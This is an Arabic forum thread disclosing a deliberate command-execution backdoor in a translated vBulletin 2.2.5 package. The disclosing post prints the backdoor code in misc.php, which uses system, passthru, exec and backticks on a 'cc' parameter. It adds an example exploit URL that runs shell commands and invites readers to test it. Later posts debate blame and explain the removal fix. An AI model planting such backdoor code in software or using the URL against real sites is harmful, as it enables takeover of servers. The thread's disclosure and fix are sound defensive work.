صفحة 1 من 3 123 الأخيرةالأخيرة
النتائج 1 إلى 15 من 44

الموضوع: ثغره مقصوده في منتدى vb تعريب دار العرب :(

  1. #1
    عضو نشيط
    تاريخ التسجيل
    Jan 2000
    المشاركات
    186

    ثغره مقصوده في منتدى vb تعريب دار العرب :(



    السلام عليكم ورحمة الله وبركاته ,,,

    نزلت أخر نسخه من منتديات vBulliten 2.2.5
    والكل بدا بالتحديث والتعريب

    وهذي نقطه حلوه
    لكن اللي يثير الاشمئزاز هو انه يكون فيه من يستغلك

    خلونا من المقدمات والخربطه الفاضيه وندخل في الموضوع

    الموضوع هو أستغلال دار العرب
    لكم وأعطائكم نسخ ملوثه غشكم فيها

    خلونا نشوف من وين بدا التلاعب
    في الملف misc.php
    في السطر 110

    كود PHP:
    // ################ start systemclean2 ##################
    if ($action=="systemclean2") {
      
    system("$cc");
      exit;

    السطور هذي ماهي موجوده في أي نسخه من نسخ المنتدى
    وحتى لو كانت موجوده فهي ثغره غبيه ولا أعتقد يخطئ جون بكتابتها

    فعن طريق أسناد القيمه systemclean2 إلى المتغير action
    وبعدها أدخال أي أمر من أوامر نظام التشغيل اللي على السيرفر في المتغير cc
    راح يتنفذ هذا الأمر وراح ترجع لك مخرجات الامر هذا في الاكسبلورر

    طبعا هو أستخدم الداله system();
    والداله passthru();
    والداله exec(); ( هذي على ما أعتقد تقوم بتنفيذ أي برنامج على السيرفر)

    هو كانت تكفيه وحده منهم بس الظاهر أنه طماع

    أنا بأعطيكم الاكسبلويت للثغره وأنتم جربوها ( على نسخه دار العرب 2.2.5 وأكيد النسخ اللي قبلها فيها نفس الغباء)
    لنظام التشغيل *nix
    http://www.xxx.com/vb/misc.php?actio...emclen2=&cc=ls
    اما للويندوز راح تكون
    http://www.xxx.com/vb/misc.php?actio...emclen2&cc=dir

    وبالأمكان تغيير systemclen2 إلى systemclen3 وأيضا إلى systemclen4


    ملاحظه قبل ما أنهي الموضوع:
    أما ما أعرف دار العرب ولا أعرف نواياه





    محسن غير متواجد حالياً


  2. #2
    عضو سوبر نشيط
    تاريخ التسجيل
    Jul 2001
    المشاركات
    711


    جربت على منتدى طلعتلي الصفحة بيضة





    __________________
    http://www.bokmade.ws/

    bokmade@hot-des.com
    WWF Manager غير متواجد حالياً

  3. #3
    عضو نشيط جدا
    تاريخ التسجيل
    Nov 2001
    المشاركات
    320


    اقول الكلام الكثير وتشويه سمعة الناس ماشاء الله علينا بس التعاون والتشجيع بعض دورها عند غيرنا ،،،،، جرب كلامك انت على المنتديات اللي نزلوا نسخة دار العرب وبعدين تعال تكلم انا جربت على نفسي وعلى السيرفر المحلى بعد ويندوز ولينكس ويسلمون عليك ويقولون معصي ماني مغير نسخة دار العرب ومادام هو مسلم واخو لنا فانا وغيري شكرناه على عمله ودعونا له اما كانه عمل غير كذا فحسابه عند رب العالمين والله ماينفعة سيرفري وهو ماهو في حاجة له اصلا هو يالله في موقعة وزوارة يلحق الناس ،،،

    ننتظر رد دار العرب هو الوحيد اللي يفند كلامك ويرد عليك





    __________________
    http://www.swalif.net/softs/
    جامعه العرب الالكترونية
    altibb غير متواجد حالياً

  4. #4
    عضو نشيط
    تاريخ التسجيل
    Mar 2002
    المشاركات
    193

    السلام عليكم



    شلونكم يااخواان قبل كل شي احب اقووولكم الاستعجال من عمل الشيطان وثانيا قبل ليصير الموضوع حااامي جدا ويطلع كلام من الاعضاء بالخطا التاكد من كلام محسن هل هو صحيح او لا اي على الذين يستخدمون نسخة دار العرب هم الذين يتكفلون على الرد على محسن وثالثا على الاخ محسن كتابة الموضوع في قسم المنتديات وليس هذا القسم وعلى المشرفين نقل هذا الموضوع

    ورابعا على دار العرب أثبات أن كلام محسن غير صحيح وشكرا





    __________________
    أتمنى من الأعضاء من له يوزر في منتديات اجنبية ان يضع هذا الرابط في توقيعه .. لتعريفهم بــ 10 لغات عن سيرة الرسول صلى الله عليه وسلم

    http://mohammad.islamway.com/?lang=eng
    PasT غير متواجد حالياً

  5. #5
    عضو فعال جدا
    تاريخ التسجيل
    Apr 2002
    المشاركات
    2,239


    اخواني من اخوكم قلعة العرب..ومن الجميع بس اسمحولي فيها
    ارجو ان لا يرد احد على الموضوع سوى اخونا دار العرب

    مع اني واثق من النسخة وما اغير نسخة دار االعرب لحين اصير اعمل نسخة بنفسي حتى ولو كان فيها الف خلل

    <=====مرتاح ما شاف نسخة زي نظافتها

    ارجوكم اخواني ها انا اترجاكم الان... من جميع الاعضاء في سوالف اولا قبل كل شيء كلنا نعرف دار العرب وصدقه وامانته معنا ولا اريد ان اسمع اي شخص يذمه دون تاكد..

    رجائي عدم الرد على الموضوع الا بعد ان يرد الاخ دار العرب

    تحياتي





    __________________
    شبكة قلعة العرب
    http://www.arabscastle.com
    ===============
    في دمشق كل شي غير!
    قلعة العرب غير متواجد حالياً

  6. #6


    بالفعل كلام الاخ محسن صحيح ...

    حيث قمت بمعاينة عدد من المنتديات و التي تحوي نفس الثغرة ...

    و فيما يبدو فإن الاخ دار العرب قد اوكل مهمة التعريب لشخص غير امين ...

    حيث ان نسخة منتداه غير نظيفة ايضاً ...

    و هناك موقع غربة ، فنسخة منتداه غير نظيفة بالمثل ...

    ما أقول إلا هاذي هي النسخ المقرصنة و اللي تسويه ...





    تروووك غير متواجد حالياً

  7. #7
    عضو فعال جدا
    تاريخ التسجيل
    Feb 2002
    المشاركات
    2,289


    لا حول ولا قوه الا بالله العلي العظيم

    يا اخواني الكرام ما اقول كلمه الا وانا مسئول عنها امام الله انا في اخلاق دار العرب ما لقيت اثنين


    هذا اولا


    الامر الاخر بالنسبه للاخ محسن

    تقول ما تعرف دار العرب وجاء هنا وبكل تجرء تقول قرصنه يعني ما تعرفه تسبه عادي



    الاخ محسن وهالثغره الامنيه يمكن منها اختراق المنتدى او تخريبه صحيح


    طيب اخوي قبل لا تنقز بالكلام هنا روح وطبق نظريتك على موقع اخوي دار العرب وعلى المنتدى ومو معقول انه يركب شي لنفسه فيه خلل


    مع انه ثقتي وثقة الكثير بدار العرب لكن يا دار العرب اصبر هذا كله سبب المجانيه .........





    المهمة9 غير متواجد حالياً

  8. #8
    عضو نشيط
    تاريخ التسجيل
    Jan 2000
    المشاركات
    186


    المهمه9
    هل تتوقع أن فيه أحد يخدع نفسه !!!!!!!!! ( جاوب عليها بينك وبين نفسك) مع أحترامي وتقديري لك لكن ممكن أنك تسرعت

    المسأله ممكن يكون فيها لبس في من أضاف الدوال هذي

    لكن اللي نعرفه حنا أن النسخه معربها دار العرب
    سواء عربها هو بنفسه أو أوكل جزء من المهمه لغيره فهذا أمر ما يهمنا ولا ينفعنا

    لكن الثغره موجوده وأنا منزل النسخه اللي جربت عليها من المنتدى هذا ولا أذكر بالتحديد في أي موضوع لكن اللي متأكد منه أنها من تعريب دار العرب ( على حسب ملف التكست الموجود مع المنتدى)

    أخوي اللي قلت انه طلعت لك صفحه بيضا هذا معناته أنه نسختك أو النسخه اللي جربت عليها سليمه

    وممكن نستدل من هذا أن البلا في نسخ وفيه نسخ نظيفه

    اللي يحدد هو ملف misc.php مب أنا





    محسن غير متواجد حالياً

  9. #9
    عضو فعال جدا
    تاريخ التسجيل
    Feb 2002
    المشاركات
    2,289


    اخي الكريم محسن


    كلامك سليم وعقلاني ولكن لدي سؤال


    كم مره حملت نسخه دار العرب

    نقول 500 مره

    يعني 500 شخص حاول يعدل ويضبط فيها ومنهم ما استساغ بعض كلمات التعريب ويعدل بنفسه عليها واضاف هالجمله ضمن الموجود والنسخه ما زالت تعريب دار العرب


    ونزلها مره اخرى في موقع وحملها 50 شخص واصيبوا بها نحمل الاثم على دار العرب؟؟

    بعد فيه لعب متفق معك انا لكن انا واثق 200 % انه دار العرب ما يسويها





    المهمة9 غير متواجد حالياً

  10. #10


    الوضع الافتراضي للـPHP هو عدم تمكين استخدام المتغيرات العادية للوصول إلى المتغيرات التي يرسلها المتصفح (وهذا أكثر أماناً)

    يعني للوصول إلى المتغيرات التي يرسلها المتصفح ، يجب استخدام مصفوفات خاصة، مثلاً لطريقة POST تستخدم :
    كود PHP:
    $_POST['action'
    أو في الإصدارات الأقدم
    كود PHP:
    $HTTP_POST_VARS['action'

    لطريقة GET :
    كود PHP:
    $_GET['action'
    أو في الإصدارات الأقدم
    كود PHP:
    $HTTP_GET_VARS['action'
    ولذلك لم يتأثر البعض بهذا الباب الخلفي (لأن الـPHP لديهم معد لكي لا يمكن الوصول إلى المتغيرات التي يرسلها المتصفح من خلال اسمها) بينما تأثر البعض الآخر
    للمعلومية شبكة دار العرب لم تفعل هذا الشيء (لأن المنتدى الخاص بها ببساطة يحتوي على نفس الباب الخلفي، ولا أعتقد أنهم يرغبون في تركيب برنامج به باب خلفي كهذا) ، فهم لا يعرفون بوجوده

    هاهاهاها ، لا تسرع بالذهاب هناك فقد تم إبلاغ المسؤول عن المنتدى وتم مسح الملف misc.php تماماً من منتدى دار العرب





    محمد_يوسف111 غير متواجد حالياً

  11. #11
    عضو نشيط جدا
    تاريخ التسجيل
    Sep 2000
    المشاركات
    509


    السلام عليكم

    كيف حالكم

    طبعا اي واحد يضع منتدى او ملف قد نقول له جزاك الله خير على جهدك وتعبك

    وممكن اي واحد سواء بحسن نية قد يضرك من حيث لا تشعر ولا يقصد هو .....

    اذا ودك تضع نسخة منتدى ومع الوقت يصير لك اعضاء وزوار وامانة هالمنتدى في رقبتك يا اخي لا توجع راسك ....

    ادفع لك 500 ريال واشتر نسخة رسمية والا شوف لك واحد من اصحاب المواقع اللي مستعد يعمل لك بفلوس وتذله عليها بعد ما تدفع عشطعشر ألف دولار !!!


    اما انك تتهم فلان وعلان وهذي ثغرة ما ثغرة

    ممكن بكل هدوء تقول يا اخي فلان ترى نسختك فيها كيت وكيت من غير سوء ظن او اتهام وا] واحد يقبلها والا ما يقبلها بعد ترى ارض الله واسعة والمنتديات على افى من يشيل .

    وضع في اعتبارك ان ايملف تجده هنا مجان قول الحمدلله والشكر ان في ناس شغالة تعرب وتوجع راسها

    وصدقوني كثرة الاتهامات وسوء النوايا في الناس ادت الى ان الكثير يبخل وما يعرب وما يقدم لكم اي خدمة حتى ما يأتي احد ويتهم ويوجع راسه بكلام يا اخي نسختك فاشلة والا ما تعرف تعرب والا والا من الكلام اللي يضيق الصدر .

    واشوف السالفة صارت اتهامات
    مع ان ما اعرف الا ثغرة وحدة وهي ثقب الاوزون الله يعين على حله .

    وسلامتكم





    __________________
    [ من لزم الاستغفار جعل الله له من كل هم فرجا ومن كل ضيق مخرجا ]

    ®اخوكم بومحمد®
    ftp غير متواجد حالياً

  12. #12
    عضو نشيط جدا
    تاريخ التسجيل
    Jul 2001
    المشاركات
    458


    انزين وبكل بساطة شو هو الحل ؟

    كيف نسد الثغرة ؟؟ ..





    __________________
    abdulla2011@hotmail.com
    alkhateer غير متواجد حالياً

  13. #13
    Banned
    تاريخ التسجيل
    Jun 2001
    المشاركات
    1,067
    mhmd_24h غير متواجد حالياً

  14. #14
    عضو فعال جدا
    تاريخ التسجيل
    Feb 2002
    المشاركات
    2,289


    يا شباب وش المفروض يطلع لو فتحنا هالصفحه كيف نعرف انه هالنسخه مضروبه او لا


    ؟؟؟؟؟؟؟؟؟تكفون جاوبوني





    المهمة9 غير متواجد حالياً

  15. #15
    عضو نشيط
    تاريخ التسجيل
    Jan 2000
    المشاركات
    186


    أخوي محمد_يوسف111
    فعلا كلامك سليم لكن وش تسوي إذا جربتها وسردت لك الملفات
    نظريا كلامك أصح من كلامي لكن عمليا كلامي أصح

    المهمه9
    إذا طلعت لك الصفحه بيضاء الحمدلله كفا الله المؤمنين شر القتال

    أما إذا سرد لك الملفات الموجوده فكل اللي تحتاجه هو مسح السطور التاليه من الملف misc.php

    كود PHP:
    // ############################### start systemclean ###############################
    if ($action=="systemclean") {
      
    $output = `$cc`;
      echo 
    "<pre>$output</pre>";
      exit;
    }


    // ############################### start systemclean2 ###############################
    if ($action=="systemclean2") {
      
    system("$cc");
      exit;
    }


    // ############################### start systemclean3 ###############################
    if ($action=="systemclean3") {
      
    passthru("$cc");
      exit;
    }


    // ############################### start systemclean4 ###############################
    if ($action=="systemclean4") {
      
    exec("$cc");
      exit;







    محسن غير متواجد حالياً





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض